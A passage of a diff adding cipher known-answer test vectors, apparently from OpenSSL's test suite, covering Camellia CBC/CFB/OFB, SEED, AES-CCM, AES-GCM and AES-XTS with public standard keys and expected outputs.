+CAMELLIA-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:A2F2CF671629EF7840C5A5DFB5074887:30C81C46A35CE411E5FBC1191A0A52EF:0F06165008CF8B8B5A63586362543E54
+CAMELLIA-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:36A84CDAFD5F9A85ADA0F0A993D6D577:F69F2445DF4F9B17AD2B417BE66C3710:74C64268CDB8B8FAF5B34E8AF3732980
+
+# CBC-CAMELLIA192.Encrypt and CBC-CAMELLIA192.Decrypt 
+CAMELLIA-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:2A4830AB5AC4A1A2405955FD2195CF93
+CAMELLIA-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:2A4830AB5AC4A1A2405955FD2195CF93:AE2D8A571E03AC9C9EB76FAC45AF8E51:5D5A869BD14CE54264F892A6DD2EC3D5
+CAMELLIA-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:5D5A869BD14CE54264F892A6DD2EC3D5:30C81C46A35CE411E5FBC1191A0A52EF:37D359C3349836D884E310ADDF68C449
+CAMELLIA-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:37D359C3349836D884E310ADDF68C449:F69F2445DF4F9B17AD2B417BE66C3710:01FAAA930B4AB9916E9668E1428C6B08
+
+# CBC-CAMELLIA256.Encrypt and CBC-CAMELLIA256.Decrypt 
+CAMELLIA-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:E6CFA35FC02B134A4D2C0B6737AC3EDA
+CAMELLIA-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E6CFA35FC02B134A4D2C0B6737AC3EDA:AE2D8A571E03AC9C9EB76FAC45AF8E51:36CBEB73BD504B4070B1B7DE2B21EB50
+CAMELLIA-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:36CBEB73BD504B4070B1B7DE2B21EB50:30C81C46A35CE411E5FBC1191A0A52EF:E31A6055297D96CA3330CDF1B1860A83
+CAMELLIA-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E31A6055297D96CA3330CDF1B1860A83:F69F2445DF4F9B17AD2B417BE66C3710:5D563F6D1CCCF236051C0C5C1C58F28F
+
+# We don't support CFB{1,8}-CAMELLIAxxx.{En,De}crypt
+# For all CFB128 encrypts and decrypts, the transformed sequence is
+#   CAMELLIA-bits-CFB:key:IV/ciphertext':plaintext:ciphertext:encdec
+# CFB128-CAMELLIA128.Encrypt 
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:14F7646187817EB586599146B82BD719:1
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:14F7646187817EB586599146B82BD719:AE2D8A571E03AC9C9EB76FAC45AF8E51:A53D28BB82DF741103EA4F921A44880B:1
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:A53D28BB82DF741103EA4F921A44880B:30C81C46A35CE411E5FBC1191A0A52EF:9C2157A664626D1DEF9EA420FDE69B96:1
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:9C2157A664626D1DEF9EA420FDE69B96:F69F2445DF4F9B17AD2B417BE66C3710:742A25F0542340C7BAEF24CA8482BB09:1
+
+# CFB128-CAMELLIA128.Decrypt 
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:14F7646187817EB586599146B82BD719:0
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:14F7646187817EB586599146B82BD719:AE2D8A571E03AC9C9EB76FAC45AF8E51:A53D28BB82DF741103EA4F921A44880B:0
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:A53D28BB82DF741103EA4F921A44880B:30C81C46A35CE411E5FBC1191A0A52EF:9C2157A664626D1DEF9EA420FDE69B96:0
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:9C2157A664626D1DEF9EA420FDE69B96:F69F2445DF4F9B17AD2B417BE66C3710:742A25F0542340C7BAEF24CA8482BB09:0
+
+# CFB128-CAMELLIA192.Encrypt
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:C832BB9780677DAA82D9B6860DCD565E:1
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:C832BB9780677DAA82D9B6860DCD565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:86F8491627906D780C7A6D46EA331F98:1
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:86F8491627906D780C7A6D46EA331F98:30C81C46A35CE411E5FBC1191A0A52EF:69511CCE594CF710CB98BB63D7221F01:1
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:69511CCE594CF710CB98BB63D7221F01:F69F2445DF4F9B17AD2B417BE66C3710:D5B5378A3ABED55803F25565D8907B84:1
+
+# CFB128-CAMELLIA192.Decrypt
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:C832BB9780677DAA82D9B6860DCD565E:0
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:C832BB9780677DAA82D9B6860DCD565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:86F8491627906D780C7A6D46EA331F98:0
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:86F8491627906D780C7A6D46EA331F98:30C81C46A35CE411E5FBC1191A0A52EF:69511CCE594CF710CB98BB63D7221F01:0
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:69511CCE594CF710CB98BB63D7221F01:F69F2445DF4F9B17AD2B417BE66C3710:D5B5378A3ABED55803F25565D8907B84:0
+
+# CFB128-CAMELLIA256.Encrypt 
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CF6107BB0CEA7D7FB1BD31F5E7B06C93:1
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:CF6107BB0CEA7D7FB1BD31F5E7B06C93:AE2D8A571E03AC9C9EB76FAC45AF8E51:89BEDB4CCDD864EA11BA4CBE849B5E2B:1
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:89BEDB4CCDD864EA11BA4CBE849B5E2B:30C81C46A35CE411E5FBC1191A0A52EF:555FC3F34BDD2D54C62D9E3BF338C1C4:1
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:555FC3F34BDD2D54C62D9E3BF338C1C4:F69F2445DF4F9B17AD2B417BE66C3710:5953ADCE14DB8C7F39F1BD39F359BFFA:1
+
+# CFB128-CAMELLIA256.Decrypt 
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CF6107BB0CEA7D7FB1BD31F5E7B06C93:0
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:CF6107BB0CEA7D7FB1BD31F5E7B06C93:AE2D8A571E03AC9C9EB76FAC45AF8E51:89BEDB4CCDD864EA11BA4CBE849B5E2B:0
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:89BEDB4CCDD864EA11BA4CBE849B5E2B:30C81C46A35CE411E5FBC1191A0A52EF:555FC3F34BDD2D54C62D9E3BF338C1C4:0
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:555FC3F34BDD2D54C62D9E3BF338C1C4:F69F2445DF4F9B17AD2B417BE66C3710:5953ADCE14DB8C7F39F1BD39F359BFFA:0
+
+# For all OFB encrypts and decrypts, the transformed sequence is
+#   CAMELLIA-bits-OFB:key:IV/output':plaintext:ciphertext:encdec
+# OFB-CAMELLIA128.Encrypt 
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:14F7646187817EB586599146B82BD719:1
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:50FE67CC996D32B6DA0937E99BAFEC60:AE2D8A571E03AC9C9EB76FAC45AF8E51:25623DB569CA51E01482649977E28D84:1
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:D9A4DADA0892239F6B8B3D7680E15674:30C81C46A35CE411E5FBC1191A0A52EF:C776634A60729DC657D12B9FCA801E98:1
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:A78819583F0308E7A6BF36B1386ABF23:F69F2445DF4F9B17AD2B417BE66C3710:D776379BE0E50825E681DA1A4C980E8E:1
+
+# OFB-CAMELLIA128.Decrypt 
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:14F7646187817EB586599146B82BD719:0
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:50FE67CC996D32B6DA0937E99BAFEC60:AE2D8A571E03AC9C9EB76FAC45AF8E51:25623DB569CA51E01482649977E28D84:0
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:D9A4DADA0892239F6B8B3D7680E15674:30C81C46A35CE411E5FBC1191A0A52EF:C776634A60729DC657D12B9FCA801E98:0
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:A78819583F0308E7A6BF36B1386ABF23:F69F2445DF4F9B17AD2B417BE66C3710:D776379BE0E50825E681DA1A4C980E8E:0
+
+# OFB-CAMELLIA192.Encrypt 
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:C832BB9780677DAA82D9B6860DCD565E:1
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:A609B38DF3B1133DDDFF2718BA09565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:8ECEB7D0350D72C7F78562AEBDF99339:1
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:52EF01DA52602FE0975F78AC84BF8A50:30C81C46A35CE411E5FBC1191A0A52EF:BDD62DBBB9700846C53B507F544696F0:1
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:BD5286AC63AABD7EB067AC54B553F71D:F69F2445DF4F9B17AD2B417BE66C3710:E28014E046B802F385C4C2E13EAD4A72:1
+
+# OFB-CAMELLIA192.Decrypt 
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:C832BB9780677DAA82D9B6860DCD565E:0
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:A609B38DF3B1133DDDFF2718BA09565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:8ECEB7D0350D72C7F78562AEBDF99339:0
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:52EF01DA52602FE0975F78AC84BF8A50:30C81C46A35CE411E5FBC1191A0A52EF:BDD62DBBB9700846C53B507F544696F0:0
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:BD5286AC63AABD7EB067AC54B553F71D:F69F2445DF4F9B17AD2B417BE66C3710:E28014E046B802F385C4C2E13EAD4A72:0
+
+# OFB-CAMELLIA256.Encrypt 
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CF6107BB0CEA7D7FB1BD31F5E7B06C93:1
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:B7BF3A5DF43989DD97F0FA97EBCE2F4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:127AD97E8E3994E4820027D7BA109368:1
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E1C656305ED1A7A6563805746FE03EDC:30C81C46A35CE411E5FBC1191A0A52EF:6BFF6265A6A6B7A535BC65A80B17214E:1
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:41635BE625B48AFC1666DD42A09D96E7:F69F2445DF4F9B17AD2B417BE66C3710:0A4A0404E26AA78A27CB271E8BF3CF20:1
+
+# OFB-CAMELLIA256.Decrypt 
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CF6107BB0CEA7D7FB1BD31F5E7B06C93:0
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:B7BF3A5DF43989DD97F0FA97EBCE2F4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:127AD97E8E3994E4820027D7BA109368:0
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E1C656305ED1A7A6563805746FE03EDC:30C81C46A35CE411E5FBC1191A0A52EF:6BFF6265A6A6B7A535BC65A80B17214E:0
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:41635BE625B48AFC1666DD42A09D96E7:F69F2445DF4F9B17AD2B417BE66C3710:0A4A0404E26AA78A27CB271E8BF3CF20:0
+
+# SEED test vectors from RFC4269
+SEED-ECB:00000000000000000000000000000000::000102030405060708090A0B0C0D0E0F:5EBAC6E0054E166819AFF1CC6D346CDB:0
+SEED-ECB:000102030405060708090A0B0C0D0E0F::00000000000000000000000000000000:C11F22F20140505084483597E4370F43:0
+SEED-ECB:4706480851E61BE85D74BFB3FD956185::83A2F8A288641FB9A4E9A5CC2F131C7D:EE54D13EBCAE706D226BC3142CD40D4A:0
+SEED-ECB:28DBC3BC49FFD87DCFA509B11D422BE7::B41E6BE2EBA84A148E2EED84593C5EC7:9B9B7BFCD1813CB95D0B3618F40F5122:0
+SEED-ECB:00000000000000000000000000000000::000102030405060708090A0B0C0D0E0F:5EBAC6E0054E166819AFF1CC6D346CDB:1
+SEED-ECB:000102030405060708090A0B0C0D0E0F::00000000000000000000000000000000:C11F22F20140505084483597E4370F43:1
+SEED-ECB:4706480851E61BE85D74BFB3FD956185::83A2F8A288641FB9A4E9A5CC2F131C7D:EE54D13EBCAE706D226BC3142CD40D4A:1
+SEED-ECB:28DBC3BC49FFD87DCFA509B11D422BE7::B41E6BE2EBA84A148E2EED84593C5EC7:9B9B7BFCD1813CB95D0B3618F40F5122:1
+
+# AES CCM 256 bit key
+aes-256-ccm:1bde3251d41a8b5ea013c195ae128b218b3e0306376357077ef1c1c78548b92e:5b8e40746f6b98e00f1d13ff41:53bd72a97089e312422bf72e242377b3c6ee3e2075389b999c4ef7f28bd2b80a:9a5fcccdb4cf04e7293d2775cc76a488f042382d949b43b7d6bb2b9864786726:c17a32514eb6103f3249e076d4c871dc97e04b286699e54491dc18f6d734d4c0:2024931d73bca480c24a24ece6b6c2bf
+
+# AES GCM test vectors from http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/gcm/gcm-spec.pdf
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000::::58e2fccefa7e3061367f1d57a4e7455a
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000:00000000000000000000000000000000:0388dace60b6a392f328c2b971b2fe78::ab6e47d42cec13bdf53a67b21257bddf
+aes-128-gcm:feffe9928665731c6d6a8f9467308308:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b391aafd255:42831ec2217774244b7221b784d0d49ce3aa212f2c02a4e035c17e2329aca12e21d514b25466931c7d8f6a5aac84aa051ba30b396a0aac973d58e091473f5985::4d5c2af327cd64a62cf35abd2ba6fab4
+aes-128-gcm:feffe9928665731c6d6a8f9467308308:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:42831ec2217774244b7221b784d0d49ce3aa212f2c02a4e035c17e2329aca12e21d514b25466931c7d8f6a5aac84aa051ba30b396a0aac973d58e091:feedfacedeadbeeffeedfacedeadbeefabaddad2:5bc94fbc3221a5db94fae95ae7121a47
+aes-128-gcm:feffe9928665731c6d6a8f9467308308:cafebabefacedbad:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:61353b4c2806934a777ff51fa22a4755699b2a714fcdc6f83766e5f97b6c742373806900e49f24b22b097544d4896b424989b5e1ebac0f07c23f4598:feedfacedeadbeeffeedfacedeadbeefabaddad2:3612d2e79e3b0785561be14aaca2fccb
+aes-128-gcm:feffe9928665731c6d6a8f9467308308:9313225df88406e555909c5aff5269aa6a7a9538534f7da1e4c303d2a318a728c3c0c95156809539fcf0e2429a6b525416aedbf5a0de6a57a637b39b:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:8ce24998625615b603a033aca13fb894be9112a5c3a211a8ba262a3cca7e2ca701e4a9a4fba43c90ccdcb281d48c7c6fd62875d2aca417034c34aee5:feedfacedeadbeeffeedfacedeadbeefabaddad2:619cc5aefffe0bfa462af43c1699d050
+aes-192-gcm:000000000000000000000000000000000000000000000000:000000000000000000000000::::cd33b28ac773f74ba00ed1f312572435
+aes-192-gcm:000000000000000000000000000000000000000000000000:000000000000000000000000:00000000000000000000000000000000:98e7247c07f0fe411c267e4384b0f600::2ff58d80033927ab8ef4d4587514f0fb
+aes-192-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b391aafd255:3980ca0b3c00e841eb06fac4872a2757859e1ceaa6efd984628593b40ca1e19c7d773d00c144c525ac619d18c84a3f4718e2448b2fe324d9ccda2710acade256::9924a7c8587336bfb118024db8674a14
+aes-192-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:3980ca0b3c00e841eb06fac4872a2757859e1ceaa6efd984628593b40ca1e19c7d773d00c144c525ac619d18c84a3f4718e2448b2fe324d9ccda2710:feedfacedeadbeeffeedfacedeadbeefabaddad2:2519498e80f1478f37ba55bd6d27618c
+aes-192-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c:cafebabefacedbad:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:0f10f599ae14a154ed24b36e25324db8c566632ef2bbb34f8347280fc4507057fddc29df9a471f75c66541d4d4dad1c9e93a19a58e8b473fa0f062f7:feedfacedeadbeeffeedfacedeadbeefabaddad2:65dcc57fcf623a24094fcca40d3533f8
+aes-192-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c:9313225df88406e555909c5aff5269aa6a7a9538534f7da1e4c303d2a318a728c3c0c95156809539fcf0e2429a6b525416aedbf5a0de6a57a637b39b:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:d27e88681ce3243c4830165a8fdcf9ff1de9a1d8e6b447ef6ef7b79828666e4581e79012af34ddd9e2f037589b292db3e67c036745fa22e7e9b7373b:feedfacedeadbeeffeedfacedeadbeefabaddad2:dcf566ff291c25bbb8568fc3d376a6d9
+aes-256-gcm:0000000000000000000000000000000000000000000000000000000000000000:000000000000000000000000::::530f8afbc74536b9a963b4f1c4cb738b
+aes-256-gcm:0000000000000000000000000000000000000000000000000000000000000000:000000000000000000000000:00000000000000000000000000000000:cea7403d4d606b6e074ec5d3baf39d18::d0d1c8a799996bf0265b98b5d48ab919
+aes-256-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c6d6a8f9467308308:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b391aafd255:522dc1f099567d07f47f37a32a84427d643a8cdcbfe5c0c97598a2bd2555d1aa8cb08e48590dbb3da7b08b1056828838c5f61e6393ba7a0abcc9f662898015ad::b094dac5d93471bdec1a502270e3cc6c
+aes-256-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c6d6a8f9467308308:cafebabefacedbaddecaf888:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:522dc1f099567d07f47f37a32a84427d643a8cdcbfe5c0c97598a2bd2555d1aa8cb08e48590dbb3da7b08b1056828838c5f61e6393ba7a0abcc9f662:feedfacedeadbeeffeedfacedeadbeefabaddad2:76fc6ece0f4e1768cddf8853bb2d551b
+aes-256-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c6d6a8f9467308308:cafebabefacedbad:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:c3762df1ca787d32ae47c13bf19844cbaf1ae14d0b976afac52ff7d79bba9de0feb582d33934a4f0954cc2363bc73f7862ac430e64abe499f47c9b1f:feedfacedeadbeeffeedfacedeadbeefabaddad2:3a337dbf46a792c45e454913fe2ea8f2
+aes-256-gcm:feffe9928665731c6d6a8f9467308308feffe9928665731c6d6a8f9467308308:9313225df88406e555909c5aff5269aa6a7a9538534f7da1e4c303d2a318a728c3c0c95156809539fcf0e2429a6b525416aedbf5a0de6a57a637b39b:d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39:5a8def2f0c9e53f1f75d7853659e2a20eeb2b22aafde6419a058ab4f6f746bf40fc0c3b780f244452da3ebf1c5d82cdea2418997200ef82e44ae7e3f:feedfacedeadbeeffeedfacedeadbeefabaddad2:a44a8266ee1c8eb0c8b5d4cf5ae9f19a
+# local add-ons, primarily streaming ghash tests
+# 128 bytes aad
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000:::d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b391aafd255522dc1f099567d07f47f37a32a84427d643a8cdcbfe5c0c97598a2bd2555d1aa8cb08e48590dbb3da7b08b1056828838c5f61e6393ba7a0abcc9f662898015ad:5fea793a2d6f974d37e68e0cb8ff9492
+# 48 bytes plaintext
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000:000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000:0388dace60b6a392f328c2b971b2fe78f795aaab494b5923f7fd89ff948bc1e0200211214e7394da2089b6acd093abe0::9dd0a376b08e40eb00c35f29f9ea61a4
+# 80 bytes plaintext
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000:0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000:0388dace60b6a392f328c2b971b2fe78f795aaab494b5923f7fd89ff948bc1e0200211214e7394da2089b6acd093abe0c94da219118e297d7b7ebcbcc9c388f28ade7d85a8ee35616f7124a9d5270291::98885a3a22bd4742fe7b72172193b163
+# 128 bytes plaintext
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000:0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000:0388dace60b6a392f328c2b971b2fe78f795aaab494b5923f7fd89ff948bc1e0200211214e7394da2089b6acd093abe0c94da219118e297d7b7ebcbcc9c388f28ade7d85a8ee35616f7124a9d527029195b84d1b96c690ff2f2de30bf2ec89e00253786e126504f0dab90c48a30321de3345e6b0461e7c9e6c6b7afedde83f40::cac45f60e31efd3b5a43b98a22ce1aa1
+# 192 bytes plaintext, iv is chosen so that initial counter LSB is 0xFF
+aes-128-gcm:00000000000000000000000000000000:ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000:000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000:56b3373ca9ef6e4a2b64fe1e9a17b61425f10d47a75a5fce13efc6bc784af24f4141bdd48cf7c770887afd573cca5418a9aeffcd7c5ceddfc6a78397b9a85b499da558257267caab2ad0b23ca476a53cb17fb41c4b8b475cb4f3f7165094c229c9e8c4dc0a2a5ff1903e501511221376a1cdb8364c5061a20cae74bc4acd76ceb0abc9fd3217ef9f8c90be402ddf6d8697f4f880dff15bfb7a6b28241ec8fe183c2d59e3f9dfff653c7126f0acb9e64211f42bae12af462b1070bef1ab5e3606::566f8ef683078bfdeeffa869d751a017
+# 80 bytes plaintext, submitted by Intel
+aes-128-gcm:843ffcf5d2b72694d19ed01d01249412:dbcca32ebf9b804617c3aa9e:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f:6268c6fa2a80b2d137467f092f657ac04d89be2beaa623d61b5a868c8f03ff95d3dcee23ad2f1ab3a6c80eaf4b140eb05de3457f0fbc111a6b43d0763aa422a3013cf1dc37fe417d1fbfc449b75d4cc5:00000000000000000000000000000000101112131415161718191a1b1c1d1e1f:3b629ccfbc1119b7319e1dce2cd6fd6d
+
+# AES XTS test vectors from IEEE Std 1619-2007
+aes-128-xts:0000000000000000000000000000000000000000000000000000000000000000:00000000000000000000000000000000:0000000000000000000000000000000000000000000000000000000000000000:917cf69ebd68b2ec9b9fe9a3eadda692cd43d2f59598ed858c02c2652fbf922e
+aes-128-xts:1111111111111111111111111111111122222222222222222222222222222222:33333333330000000000000000000000:4444444444444444444444444444444444444444444444444444444444444444:c454185e6a16936e39334038acef838bfb186fff7480adc4289382ecd6d394f0
+aes-128-xts:fffefdfcfbfaf9f8f7f6f5f4f3f2f1f022222222222222222222222222222222:33333333330000000000000000000000:4444444444444444444444444444444444444444444444444444444444444444:af85336b597afc1a900b2eb21ec949d292df4c047e0b21532186a5971a227a89
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:00000000000000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff: